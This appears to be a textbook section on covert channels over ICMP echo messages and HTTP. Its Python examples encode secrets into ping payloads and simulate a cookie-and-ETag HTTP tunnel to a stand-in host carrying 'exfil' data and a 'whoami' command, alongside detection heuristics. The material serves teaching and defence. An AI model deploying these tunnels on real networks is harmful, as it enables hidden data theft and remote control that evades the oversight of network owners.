5.3 Covert Channels Using ICMP Tunnels
Even today many systems remain exposed to this type of covert channel, although it
was first described as long ago as 1996. The only requirement for sending clandestine
information in ICMP packets is that the network permits ICMP echo traffic. Many
regard this traffic as benign, and within its intended scope it is: ICMP exists to
report errors and to test or measure network reachability and performance, and it is
widely used for network management.
ICMP messages are carried inside IP datagrams. The first 32 bits of the ICMP header
always have the same layout (an 8-bit type, an 8-bit code and a 16-bit checksum); the
meaning of the rest of the header depends on which of the fifteen message types
defined by the protocol is being sent.
The ICMP messages that lend themselves to this 'defect' are ICMP_ECHO (echo request,
type 8) and ICMP_ECHOREPLY (echo reply, type 0). They were designed so that a host can
send a query and obtain a response, but that same design makes them a potential
vehicle for hidden data streams. The ping utility, for example, does nothing more than
send and receive such messages. So how can we send and receive arbitrary data through
an ICMP tunnel?
Echo messages carry a variable-length Data field. Ping normally fills it with a
timestamp, from which it computes the round-trip time, followed by filler bytes, and
the protocol requires the receiver to copy the request's data unchanged into the
reply. No intermediate device checks or constrains the contents of this field, so it
can be used to carry arbitrary data, thus creating a covert channel.
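The following is an added example, not code from the chapter: it builds ICMP echo requests whose Data field carries chunks of a message, reassembles them on the receiving side, and shows two checks a defender can run on captured payloads (the reply must echo the request's data, and a stock ping payload has a recognisable shape). The 32-byte chunk size, the identifier value, and the assumption that an ordinary ping payload is a timestamp followed by a run of incrementing bytes are assumptions of the example, not facts from the text. It uses only the Python standard library and sends nothing; putting these bytes on the wire would require a raw socket.

```python
# Added example (not from the chapter): ICMP echo messages as a covert carrier,
# built and parsed with the standard library only. Nothing is sent; putting these
# bytes on the wire would need a raw socket (SOCK_RAW, IPPROTO_ICMP) and privileges.
import struct

ICMP_ECHO = 8        # echo request (query)
ICMP_ECHOREPLY = 0   # echo reply
CHUNK = 32           # assumed chunk size; fixed-size payloads keep packet lengths uniform


def rfc1071_checksum(data: bytes) -> int:
    """One's-complement sum of 16-bit words, as ICMP requires (RFC 792 / RFC 1071).
    Run over a complete packet, it returns 0 when the embedded checksum is correct."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo(msg_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Assemble type | code | checksum | identifier | sequence | data."""
    header = struct.pack("!BBHHH", msg_type, 0, 0, ident, seq)
    csum = rfc1071_checksum(header + payload)
    return struct.pack("!BBHHH", msg_type, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes):
    """Return (type, ident, seq, payload); raise ValueError on a damaged packet."""
    if len(packet) < 8:
        raise ValueError("short ICMP packet")
    if rfc1071_checksum(packet) != 0:
        raise ValueError("bad ICMP checksum")
    msg_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return msg_type, ident, seq, packet[8:]


def encode_covert(secret: bytes, ident: int) -> list:
    """Sender: split the secret across echo requests. The first payload byte holds
    the chunk length, the sequence number orders the chunks and the identifier
    ties them to one stream."""
    packets = []
    for seq, off in enumerate(range(0, len(secret), CHUNK)):
        piece = secret[off:off + CHUNK]
        payload = bytes([len(piece)]) + piece.ljust(CHUNK, b"\x00")
        packets.append(build_echo(ICMP_ECHO, ident, seq, payload))
    return packets


def decode_covert(packets: list, ident: int) -> bytes:
    """Receiver: collect echo requests for one identifier, reassemble by sequence."""
    chunks = {}
    for pkt in packets:
        msg_type, pid, seq, payload = parse_echo(pkt)
        if msg_type == ICMP_ECHO and pid == ident:
            chunks[seq] = payload[1:1 + payload[0]]
    return b"".join(chunks[k] for k in sorted(chunks))


def reply_echoes_request(request: bytes, reply: bytes) -> bool:
    """Defender check 1: RFC 792 requires the reply to return the request's data
    unchanged; a reply whose payload differs is carrying something of its own."""
    return parse_echo(request)[3] == parse_echo(reply)[3]


def looks_like_stock_ping(payload: bytes) -> bool:
    """Defender check 2 (heuristic, an assumption of this example): common ping
    implementations send a timestamp followed by a run of incrementing bytes. A
    payload that does not fit that shape deserves a closer look. An attacker can
    mimic the pattern, so treat this as a triage hint, not proof."""
    body = payload[16:]
    if len(body) < 2:
        return False
    return all((body[i] + 1) & 0xFF == body[i + 1] for i in range(len(body) - 1))


if __name__ == "__main__":
    secret = b"covert payload: " + b"A" * 50          # constructed sample data
    stream = encode_covert(secret, ident=0x1234)
    print(len(stream), "echo requests of", len(stream[0]), "bytes each")
    print("round trip ok:", decode_covert(stream, 0x1234) == secret)
    print("stock ping shape:", looks_like_stock_ping(parse_echo(stream[0])[3]))
```

Both defender checks are cheap enough to run over a packet capture. The first is exact: a reply that does not echo its request violates the protocol. The second is only a heuristic and is easily defeated by a tunnel that reserves the last bytes of each payload for the expected filler pattern, which is why payload-length variance and request rate per host are usually added alongside it.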
5.3.1 HTTP/S Tunnel
Various factors may be taken into account when designing a covert channel based on
HTTP, and there is no single way to do it. One could consider the server model to be
implemented (an HTTP daemon, a proxy or a CGI program); how to obfuscate the traffic
so as to disguise the channel further (proxy chains, generation of decoy noise, and so
on); or the type of functionality required. Having settled these aspects, we can turn
to applying the model in practice, starting with which HTTP methods to use (GET,
CONNECT, POST, ...).
As with any covert channel implementation, it may be useful to apply steganographic
or cryptographic techniques to further confuse anyone observing the generated traffic
and make the communication even harder to detect.
In principle, though, there must be two processes capable of working in synchrony:
one inside the network from which we wish to obtain information (or into which we
want to intrude) and another on the outside. The external server must be reachable
from the inside and, when contacted, must not raise the suspicions of any controlling
mechanism, whether automatic or human. Since we are dealing with HTTP requests, the
server must behave as if it were capable of processing such requests, while the client
sends suitably encoded information formally presented as normal HTTP requests.
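As an added example that is not part of the chapter, the two synchronised processes described above can be sketched in memory: the client hides upstream data in the `session` cookie of ordinary-looking GET requests for a static asset, the server answers as a static file server would and hides downstream data in the `ETag` header of its replies, and a defender-side heuristic flags a session cookie that changes on every request. The host name `cdn.example.com`, the `/assets/app.js` path, the 48-byte chunk size and the choice of cookie and ETag as carriers are assumptions of the example. It uses only the Python standard library; no connection is opened, the request and response bytes are handed directly from one side to the other.

```python
# Added example (not from the chapter): an HTTP tunnel in which the client hides
# upstream data in a "session" cookie of ordinary-looking GET requests and the server
# hides downstream data in the ETag of its replies. Standard library only; the exchange
# is simulated in memory, so host name, path and header values are assumptions.
import base64
from typing import Optional

HOST = "cdn.example.com"   # assumed name of the external server
CHUNK = 48                 # assumed bytes carried per request and per response


def b64url(data: bytes) -> str:
    """Unpadded base64url: indistinguishable from any opaque web token."""
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def header_value(raw: bytes, name: str) -> Optional[str]:
    """Minimal HTTP/1.1 header lookup (case-insensitive, first match)."""
    head = raw.partition(b"\r\n\r\n")[0].decode()
    for line in head.split("\r\n")[1:]:
        key, _, value = line.partition(":")
        if key.strip().lower() == name.lower():
            return value.strip()
    return None


def cookie_value(raw: bytes, key: str) -> Optional[str]:
    for cookie in (header_value(raw, "Cookie") or "").split(";"):
        k, _, v = cookie.strip().partition("=")
        if k == key:
            return v
    return None


def encode_request(chunk: bytes, seq: int) -> bytes:
    """Client: one upstream chunk, prefixed with a 2-byte sequence number, as a cookie.
    An empty chunk is a poll that gives the server a chance to answer."""
    token = b64url(seq.to_bytes(2, "big") + chunk)
    lines = [
        f"GET /assets/app.js?v={seq} HTTP/1.1",
        f"Host: {HOST}",
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0",
        "Accept: */*",
        f"Cookie: session={token}",
        "Connection: keep-alive",
        "", "",
    ]
    return "\r\n".join(lines).encode()


def decode_request(raw: bytes):
    """Server: recover (seq, chunk) from the cookie; raise if it is absent."""
    token = cookie_value(raw, "session")
    if token is None:
        raise ValueError("no covert cookie")
    blob = b64url_decode(token)
    return int.from_bytes(blob[:2], "big"), blob[2:]


def encode_response(chunk: bytes) -> bytes:
    """Server: answer like a static asset; the downstream chunk rides in the ETag."""
    body = b"/* static asset */\n"
    lines = [
        "HTTP/1.1 200 OK",
        "Content-Type: application/javascript",
        f"Content-Length: {len(body)}",
        f'ETag: "{b64url(chunk)}"',
        "Cache-Control: no-cache",
        "", "",
    ]
    return "\r\n".join(lines).encode() + body


def decode_response(raw: bytes) -> bytes:
    """Client: recover the downstream chunk from the ETag."""
    etag = header_value(raw, "ETag")
    if etag is None:
        raise ValueError("no covert ETag")
    return b64url_decode(etag.strip('"'))


def tunnel_roundtrip(upstream: bytes, downstream: bytes):
    """Run both sides in memory until both byte streams have been delivered.
    Returns (what the server received, what the client received)."""
    up = [upstream[i:i + CHUNK] for i in range(0, len(upstream), CHUNK)]
    down = [downstream[i:i + CHUNK] for i in range(0, len(downstream), CHUNK)]
    server_got, client_got = {}, []
    for seq in range(max(len(up), len(down))):
        request = encode_request(up[seq] if seq < len(up) else b"", seq)
        s, chunk = decode_request(request)             # server side
        server_got[s] = chunk
        response = encode_response(down[seq] if seq < len(down) else b"")
        client_got.append(decode_response(response))   # client side
    return b"".join(server_got[k] for k in sorted(server_got)), b"".join(client_got)


def cookie_churn(requests) -> float:
    """Defender heuristic: a session cookie should be stable within a session. The
    share of distinct values (1.0 = a new value on every request) is one signal that
    the cookie is a data carrier rather than an identifier."""
    seen = {cookie_value(r, "session") for r in requests}
    return len(seen) / max(len(requests), 1)


if __name__ == "__main__":
    got_up, got_down = tunnel_roundtrip(b"exfil:" + b"X" * 100, b"cmd:whoami")
    print(got_up[:6], got_down)
    print("cookie churn:", cookie_churn([encode_request(b"", s) for s in range(5)]))
```

The sequence number lets the server reorder requests that arrive out of order through a proxy chain, and the empty poll request is what turns a one-way exfiltration channel into the two-way tunnel the text calls for. On the defensive side, `cookie_churn` is the kind of per-client statistic a proxy log can yield without decrypting anything: a browser session whose cookie value never repeats, or whose ETags never match across repeated requests for the same asset, is behaving unlike the cache-driven traffic it imitates.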